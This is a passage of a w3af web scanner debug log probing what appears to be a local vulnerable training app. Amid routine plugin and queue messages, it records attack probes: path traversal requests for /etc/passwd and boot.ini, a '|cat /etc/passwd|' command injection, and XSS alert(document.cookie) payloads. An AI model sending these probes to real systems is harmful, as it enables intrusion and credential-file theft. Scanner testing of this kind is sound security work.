2122. [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/.cobalt/message/message.cgi?info= returned HTTP code "404" (id=22933,from_cache=0,grep=1,rtt=0.12,did=fjdDn88x) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4393. [Wed Feb 12 10:04:27 2020 - debug] Connections with more in use time: (d5ef416b5df1344f, 0.06 sec) (bfbfe4de64ee73f0, 0.03 sec) (f68474ff126c8504, 0.02 sec) (650348b5951f295c, 0.01 sec) (6bfd72a4a3ceaa0d, 0.00 sec) [Wed Feb 12 10:04:27 2020 - debug] deserialization.audit(did="i0SErofK", uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") [Wed Feb 12 10:04:27 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a5_broken_access_control" () [Wed Feb 12 10:04:27 2020 - debug] csrf.audit(did="7ut78yeK",uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/learn/vulnerability/a7_xss returned HTTP code "200" (id=22932,from_cache=1,grep=1,rtt=0.49,did=PmGYplU5) [Wed Feb 12 10:04:27 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:27 2020 - debug] os_commanding.audit(did="ECQcWxwo", uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") [Wed Feb 12 10:04:27 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a5_broken_access_control" () [Wed Feb 12 10:04:27 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a5_broken_access_control" () [Wed Feb 12 10:04:27 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:ECQcWxwo) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2123. [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4394. [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2124. [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4395. [Wed Feb 12 10:04:27 2020 - debug] lfi.audit(did="iTMxNDM0", uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") [Wed Feb 12 10:04:27 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a5_broken_access_control" () [Wed Feb 12 10:04:27 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:iTMxNDM0) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/cgiwrap/~listen returned HTTP code "404" (id=22937,from_cache=0,grep=1,rtt=0.13,did=txKbcz2s) [Wed Feb 12 10:04:27 2020 - debug] sqli.audit(did="eGrswoTj", uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") [Wed Feb 12 10:04:27 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a5_broken_access_control" () [Wed Feb 12 10:04:27 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:eGrswoTj) [Wed Feb 12 10:04:27 2020 - debug] blind_sqli.audit(did="IZoOFIG4", uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") [Wed Feb 12 10:04:27 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a5_broken_access_control" () [Wed Feb 12 10:04:27 2020 - debug] phishing_vector.audit(did="Nbkof1Fc", uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") [Wed Feb 12 10:04:27 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a5_broken_access_control" () [Wed Feb 12 10:04:27 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:Nbkof1Fc) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4396. [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2125. [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/athcgi.exe?command=showpage&script=\'],[0,0]]&alert(\'Vulnerable\')=&a=[[\' returned HTTP code "404" (id=22938,from_cache=0,grep=1,rtt=0.07,did=Ih7vbVJt) [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cgi-bin/dcshop/orders/orders.txt returned HTTP code "404" (id=22941,from_cache=0,grep=1,rtt=0.08,did=c5bMI4ks) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4397. [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/index.php?download=/etc/passwd returned HTTP code "404" (id=22939,from_cache=0,grep=1,rtt=0.07,did=Q9vgoulc) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/pforum/edituser.php?boardid=&agree=1&username=&nickname=test&email=test@example.com&pwd=test&pwd2=test&filled=1 returned HTTP code "404" (id=22942,from_cache=0,grep=1,rtt=0.11,did=aSkaEdJ7) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2126. [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/input2.bat?|dir ..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\= returned HTTP code "404" (id=22940,from_cache=0,grep=1,rtt=0.08,did=Tz1RUBSL) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/learn/vulnerability/a3_sensitive_data returned HTTP code "200" (id=22945,from_cache=0,grep=1,rtt=0.09,did=cOVAKTzD) [Wed Feb 12 10:04:27 2020 - debug] cors_origin.audit(did="cOVAKTzD",uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") took 1.33s to run (0.20s 14% sending HTTP requests) [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/author.asp returned HTTP code "404" (id=22948,from_cache=0,grep=1,rtt=0.02,did=Jrm8deV5) [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cgi-bin/wwwadmin.pl returned HTTP code "404" (id=22950,from_cache=0,grep=1,rtt=0.10,did=Bv5P7vIJ) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cutenews/index.php?debug= returned HTTP code "404" (id=22951,from_cache=0,grep=1,rtt=0.09,did=9gAZXXrZ) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie)&[/script]=&ratetype=percent returned HTTP code "404" (id=22946,from_cache=0,grep=1,rtt=0.14,did=4vwISTXu) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/index.php/\\">< returned HTTP code "404" (id=22943,from_cache=0,grep=1,rtt=0.05,did=TWJjxGWF) [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cgi-bin/shop/auth_data/auth_user_file.txt returned HTTP code "404" (id=22944,from_cache=0,grep=1,rtt=0.11,did=5LuNFfnD) [Wed Feb 12 10:04:27 2020 - debug] localhost:9090 connection pool stats (free:110 / in_use:5 / max:50 / total:115) [Wed Feb 12 10:04:27 2020 - debug] Connections with more in use time: (f68474ff126c8504, 0.09 sec) (794ebe9ff1023720, 0.04 sec) (650348b5951f295c, 0.03 sec) (6bfd72a4a3ceaa0d, 0.03 sec) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/phptonuke.php?filnavn= returned HTTP code "404" (id=22949,from_cache=0,grep=1,rtt=0.11,did=8mJ3SGeQ) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4398. [Wed Feb 12 10:04:27 2020 - debug] generic.audit(did="1ipbPVGS", uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") [Wed Feb 12 10:04:27 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a5_broken_access_control" () [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/add.php3?url=ja&adurl=javascript: returned HTTP code "404" (id=22947,from_cache=0,grep=1,rtt=0.10,did=XerOmgv3) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/download.php?sortby=&dcategory= returned HTTP code "404" (id=22953,from_cache=0,grep=1,rtt=0.06,did=OPZoVhMb) [Wed Feb 12 10:04:27 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11727, 'reject-seen-url': 5584, 'reject-out-of-scope': 215, 'accept': 4799} [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert(\'Vulnerable\')&mode=0&message=Hello returned HTTP code "404" (id=22954,from_cache=0,grep=1,rtt=0.14,did=TXa76YSA) [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cgi-bin/SGB_DIR/superguestconfig returned HTTP code "404" (id=22955,from_cache=0,grep=1,rtt=0.12,did=jj7jQwIg) [Wed Feb 12 10:04:27 2020 - debug] Worker with ID WorkerThread(vSScJjAn) has been running job 4287 for 10.62 seconds. The job is: _send_and_check(((NiktoTest(id=u\'000498\', osvdb=u\'0\', tune=u\'b\', uri= has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:27 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:27 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/forums/index.php?board=&action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD returned HTTP code "404" (id=22962,from_cache=0,grep=1,rtt=0.06,did=0Kg2oc5O) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/user.php?op=confirmnewuser&module=NS-NewUser&uname=">=&email=test@test.com returned HTTP code "404" (id=22952,from_cache=0,grep=1,rtt=0.05,did=siPrIXj5) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2127. [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/[SecCheck]/..%5c..%5c../ext.ini returned HTTP code "404" (id=22956,from_cache=0,grep=1,rtt=0.12,did=93vVFZJA) [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cbms/editclient.php returned HTTP code "404" (id=22959,from_cache=0,grep=1,rtt=0.11,did=UUwov7AC) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/modules.php?op=modload&name=Xforum&file=&fid=2 returned HTTP code "404" (id=22961,from_cache=0,grep=1,rtt=0.16,did=vINI4nKQ) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/upload.php?type=\\" returned HTTP code "404" (id=22966,from_cache=0,grep=1,rtt=0.05,did=NZYNIjph) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/fom/fom.cgi?cmd=&file=1&keywords=vulnerable returned HTTP code "404" (id=22967,from_cache=0,grep=1,rtt=0.03,did=vOKUBJh3) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/modules.php?name=Surveys&pollID= returned HTTP code "404" (id=22957,from_cache=0,grep=1,rtt=0.17,did=feIeN00i) [Wed Feb 12 10:04:27 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/faqmanager.cgi?toc=/etc/passwd\x00 returned HTTP code "404" (id=22965,from_cache=0,grep=1,rtt=0.06,did=ubgJZ7XT) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd returned HTTP code "404" (id=22968,from_cache=0,grep=1,rtt=0.08,did=lLWSpLiK) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4399. [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cfdocs/snippets/fileexists.cfm returned HTTP code "404" (id=22960,from_cache=0,grep=1,rtt=0.08,did=LV5O1gcz) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/mailman/options/yourlist?language=en&email=<=<=&SCRIPT=>=>=&alert(\'Vulnerable\')=&/SCRIPT= returned HTTP code "404" (id=22958,from_cache=0,grep=1,rtt=0.05,did=gkJQ5Gjo) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/submit.php?subject=&story=&storyext=&op=Preview returned HTTP code "404" (id=22964,from_cache=0,grep=1,rtt=0.10,did=J8IkZVoT) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/MsmMask.exe?mask=/junk334 returned HTTP code "404" (id=22970,from_cache=0,grep=1,rtt=0.04,did=N5eTKQdX) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/webMathematica/MSP?MSPStoreID=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini&MSPStoreType=image/gif returned HTTP code "404" (id=22963,from_cache=0,grep=1,rtt=0.10,did=Kcp86rmh) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/zml.cgi?file=../../../../../../../../../../etc/passwd\x00 returned HTTP code "404" (id=22971,from_cache=0,grep=1,rtt=0.00,did=PiZtGTJ0) [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cgi-bin/DCShop/orders/orders.txt returned HTTP code "404" (id=22973,from_cache=0,grep=1,rtt=0.04,did=bJtHjMqa) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4400. [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd returned HTTP code "404" (id=22969,from_cache=0,grep=1,rtt=0.07,did=m1z7rwAT) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4401. [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4401. [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4401. [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cgi-bin/mt/mt-load.cgi returned HTTP code "404" (id=22974,from_cache=0,grep=1,rtt=0.05,did=Nd0QGW2H) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/.cobalt/alert/service.cgi?service= returned HTTP code "404" (id=22972,from_cache=0,grep=1,rtt=0.05,did=PsEnJTSC) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/hp/device/this.LCDispatcher returned HTTP code "404" (id=22978,from_cache=0,grep=1,rtt=0.03,did=0YZ31rJe) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/calendar_admin.pl?config=|cat /etc/passwd| returned HTTP code "404" (id=22979,from_cache=0,grep=1,rtt=0.15,did=YoaQGkOt) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4402. [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/cgiwrap/~sshd returned HTTP code "404" (id=22976,from_cache=0,grep=1,rtt=0.20,did=V3ybJgpx) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/administrator/upload.php?newbanner=1&choice=\\" returned HTTP code "404" (id=22975,from_cache=0,grep=1,rtt=0.11,did=Yw28AxZC) [Wed Feb 12 10:04:27 2020 - debug] expect_ct.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] meta_generator.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] retirejs.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] file_upload.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:27 2020 - debug] serialized_object.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] blank_body.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] credit_cards.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] websockets_links.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] csp.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] dom_xss.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] motw.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] keys.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] private_ip.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] clamav.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] svn_users.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] objects.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] error_500.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] meta_tags.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] password_profiling.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] click_jacking.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] lang.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] localhost:9090 connection pool stats (free:112 / in_use:4 / max:50 / total:116) [Wed Feb 12 10:04:27 2020 - debug] Connections with more in use time: (49303da565ef873b, 0.16 sec) (b1a7b13ec8d8daaf, 0.04 sec) (b442c2bc7f09dce4, 0.04 sec) (f68474ff126c8504, 0.04 sec) [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cgi-bin/shop/orders/orders.txt returned HTTP code "404" (id=22981,from_cache=0,grep=1,rtt=0.08,did=rciajGB8) [Wed Feb 12 10:04:27 2020 - debug] symfony.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie)&[/script]=&ratetype=percent returned HTTP code "404" (id=22980,from_cache=0,grep=1,rtt=0.11,did=XmJnRLhj) [Wed Feb 12 10:04:27 2020 - debug] url_session.grep(uri="http://localhost:9090/20/") took 0.11s to run [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cfdocs/expeval/displayopenedfile.cfm returned HTTP code "404" (id=22977,from_cache=0,grep=1,rtt=0.03,did=7tdV0gOp) [Wed Feb 12 10:04:27 2020 - debug] strange_reason.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4403. [Wed Feb 12 10:04:27 2020 - debug] error_pages.grep(uri="http://localhost:9090/20/") took 0.06s to run [Wed Feb 12 10:04:27 2020 - debug] cache_control.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] strange_headers.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] ssn.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] vulners_db.grep(uri="http://localhost:9090/20/") took 0.08s to run [Wed Feb 12 10:04:27 2020 - debug] oracle.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] feeds.grep(uri="http://localhost:9090/20/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4404. [Wed Feb 12 10:04:27 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/20/") took 0.02s to run [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/modules.php?op=modload&name=Wiki&file=index&pagename= returned HTTP code "404" (id=22991,from_cache=0,grep=1,rtt=0.11,did=YOYd1cPa) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/cgiwrap/~lp returned HTTP code "404" (id=22992,from_cache=0,grep=1,rtt=0.23,did=Oo7BChNZ) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/.cobalt/admin/.htaccess returned HTTP code "404" (id=22983,from_cache=0,grep=1,rtt=0.09,did=FrArWAY0) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/user.php?op=confirmnewuser&module=NS-NewUser&uname=">=&email=test@test.com returned HTTP code "404" (id=22990,from_cache=0,grep=1,rtt=0.18,did=rrWWvGW7) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/horde/test.php returned HTTP code "404" (id=22985,from_cache=0,grep=1,rtt=0.11,did=Q4m6HEcw) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/modules.php?name=Stories_Archive&sa=show_month&year=&month=3&month_l=test returned HTTP code "404" (id=22988,from_cache=0,grep=1,rtt=0.09,did=jqnkdQmL) [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cbms/passgen.php returned HTTP code "404" (id=22986,from_cache=0,grep=1,rtt=0.13,did=CQqjINIo) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4405. [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/phprank/add.php?page=add&spass=1&name=2&siteurl=3&email= returned HTTP code "404" (id=22982,from_cache=0,grep=1,rtt=0.08,did=cQbATO5h) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert(\'Vulnerable\')&message=MESSAGE&submitpm=Submit returned HTTP code "404" (id=22989,from_cache=0,grep=1,rtt=0.04,did=d9rLcVAT) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/default.php?info_message== returned HTTP code "404" (id=22987,from_cache=0,grep=1,rtt=0.12,did=VJAs4gMC) [Wed Feb 12 10:04:27 2020 - debug] Worker with ID CrawlInfraWorker(br5sQhGq) has been running job 840 for 267.44 seconds. The job is: _discover_worker(, , kwargs={}). Function call tree: /home/ayush/w3af/w3af/core/controllers/threads/threadpool.py:72 @ __call__(), /home/ayush/w3af/w3af/core/controllers/core_helpers/consumers/base_consumer.py:54 @ _wrapper(), /home/ayush/w3af/w3af/core/controllers/core_helpers/consumers/crawl_infrastructure.py:527 @ _discover_worker(), /home/ayush/w3af/w3af/core/controllers/plugins/crawl_plugin.py:56 @ discover_wrapper(), /home/ayush/w3af/w3af/plugins/crawl/archive_dot_org.py:88 @ crawl(), /home/ayush/w3af/w3af/plugins/crawl/archive_dot_org.py:161 @ _spider_archive(), /home/ayush/w3af/w3af/core/controllers/threads/threadpool.py:491 @ map_multi_args(), /home/ayush/w3af/w3af/core/controllers/threads/pool276.py:672 @ get(), /home/ayush/w3af/w3af/core/controllers/threads/pool276.py:667 @ wait(), /usr/lib/python2.7/threading.py:340 @ wait() [Wed Feb 12 10:04:27 2020 - debug] Worker with ID CrawlInfraWorker(N5yqeDHB) has been running job 247 for 787.70 seconds. The job is: _discover_worker(, , kwargs={}). Function call tree: /home/ayush/w3af/w3af/core/controllers/threads/threadpool.py:72 @ __call__(), /home/ayush/w3af/w3af/core/controllers/core_helpers/consumers/base_consumer.py:54 @ _wrapper(), /home/ayush/w3af/w3af/core/controllers/core_helpers/consumers/crawl_infrastructure.py:527 @ _discover_worker(), /home/ayush/w3af/w3af/core/controllers/plugins/crawl_plugin.py:56 @ discover_wrapper(), /home/ayush/w3af/w3af/plugins/crawl/pykto.py:96 @ crawl(), /home/ayush/w3af/w3af/plugins/crawl/pykto.py:126 @ _run(), /home/ayush/w3af/w3af/core/controllers/threads/threadpool.py:491 @ map_multi_args(), /home/ayush/w3af/w3af/core/controllers/threads/pool276.py:672 @ get(), /home/ayush/w3af/w3af/core/controllers/threads/pool276.py:667 @ wait(), /usr/lib/python2.7/threading.py:340 @ wait() [Wed Feb 12 10:04:27 2020 - debug] Worker with ID CrawlInfraWorker(z6MGDQIP) has been running job 661 for 292.67 seconds. The job is: _discover_worker(, , kwargs={}). Function call tree: /home/ayush/w3af/w3af/core/controllers/threads/threadpool.py:72 @ __call__(), /home/ayush/w3af/w3af/core/controllers/core_helpers/consumers/base_consumer.py:54 @ _wrapper(), /home/ayush/w3af/w3af/core/controllers/core_helpers/consumers/crawl_infrastructure.py:527 @ _discover_worker(), /home/ayush/w3af/w3af/core/controllers/plugins/crawl_plugin.py:56 @ discover_wrapper(), /home/ayush/w3af/w3af/plugins/crawl/open_api.py:99 @ crawl(), /home/ayush/w3af/w3af/plugins/crawl/open_api.py:396 @ _analyze_current_path(), /home/ayush/w3af/w3af/core/controllers/threads/threadpool.py:491 @ map_multi_args(), /home/ayush/w3af/w3af/core/controllers/threads/pool276.py:672 @ get(), /home/ayush/w3af/w3af/core/controllers/threads/pool276.py:667 @ wait(), /usr/lib/python2.7/threading.py:340 @ wait() [Wed Feb 12 10:04:27 2020 - debug] Worker with ID CrawlInfraWorker(1i39mCZz) has been running job 863 for 10.57 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 10:04:27 2020 - debug] 0% of CrawlInfraWorker workers are idle. [Wed Feb 12 10:04:27 2020 - debug] CrawlInfraWorker worker pool internal thread state: (worker: True, task: True, result: True) [Wed Feb 12 10:04:27 2020 - debug] CrawlInfraWorker worker pool has 77 tasks in inqueue and 0 tasks in outqueue [Wed Feb 12 10:04:27 2020 - debug] detailed.has_active_session() and detailed.login() [Wed Feb 12 10:04:27 2020 - debug] [auth.detailed] Checking if session for user admin is active (did: sejgaLc3) [Wed Feb 12 10:04:27 2020 - debug] wordpress_fingerprint.discover(did="kS618ucL",uri="http://localhost:9090/learn/vulnerability/a7_xss") took 2.17s to run [Wed Feb 12 10:04:27 2020 - debug] 